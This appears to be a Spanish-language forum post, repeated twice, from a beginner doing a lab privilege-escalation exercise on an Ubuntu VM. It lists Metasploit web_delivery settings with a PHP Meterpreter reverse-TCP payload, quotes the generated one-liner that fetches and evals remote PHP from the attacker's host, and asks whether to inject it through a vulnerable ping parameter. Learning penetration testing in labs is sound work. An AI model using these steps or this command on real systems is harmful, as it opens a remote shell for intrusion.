Buenos días,
Tengo que hacer una escalada de privilegios de una máquina virtual basada en Ubuntu.
Detecto a través de la herramienta VEGA, que existe 1 vulnerabilidad crítica "Shell Injection" y para explotar la misma, me obligan a realizarlo a través del módulo web_delivery de metaesploit, por tanto, procedo a los siguientes pasos:
Use exploit/multi/script/web_delivery
Msf exploit (web_delivery)>set lhost 192.168.1.132
(entiendo que aquí es donde pongo la ip de la máquina donde tengo alojado Kali Linux, sin embargo, en ningún momento estoy metiendo la IP de la máquina donde tengo que hacer la escalada de privilegios, que sería Rhost si no me equivoco)
Msf exploit (web_delivery)>set lport 4444
Msf exploit (web_delivery)>set target 1
Msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp
(entiendo que elijo PHP ya que es Ubuntu donde se encuentra la máquina a atacar)
Msf exploit (web_delivery)>run
Obtengo el siguiente código malicioso php, sin embargo, no sé dónde ejecutarlo en la máquina de la víctima.
Php –d allow_url_fopen=true –r "eval(file_get_contents(´http://192.168.1.132:8080/qH0s5l2UGvbKap'));"
¿lo pongo seguido a la url? http://192.168.1.132/ping/index.php?ip=
Estoy empezando en esto y soy muy torpe.
Gracias de antemano.
Tengo que hacer una escalada de privilegios de una máquina virtual basada en Ubuntu.
Detecto a través de la herramienta VEGA, que existe 1 vulnerabilidad crítica "Shell Injection" y para explotar la misma, me obligan a realizarlo a través del módulo web_delivery de metaesploit, por tanto, procedo a los siguientes pasos:
Use exploit/multi/script/web_delivery
Msf exploit (web_delivery)>set lhost 192.168.1.132
(entiendo que aquí es donde pongo la ip de la máquina donde tengo alojado Kali Linux, sin embargo, en ningún momento estoy metiendo la IP de la máquina donde tengo que hacer la escalada de privilegios, que sería Rhost si no me equivoco)
Msf exploit (web_delivery)>set lport 4444
Msf exploit (web_delivery)>set target 1
Msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp
(entiendo que elijo PHP ya que es Ubuntu donde se encuentra la máquina a atacar)
Msf exploit (web_delivery)>run
Obtengo el siguiente código malicioso php, sin embargo, no sé dónde ejecutarlo en la máquina de la víctima.
Php –d allow_url_fopen=true –r "eval(file_get_contents(´http://192.168.1.132:8080/qH0s5l2UGvbKap'));"
¿lo pongo seguido a la url? http://192.168.1.132/ping/index.php?ip=
Estoy empezando en esto y soy muy torpe.
Gracias de antemano.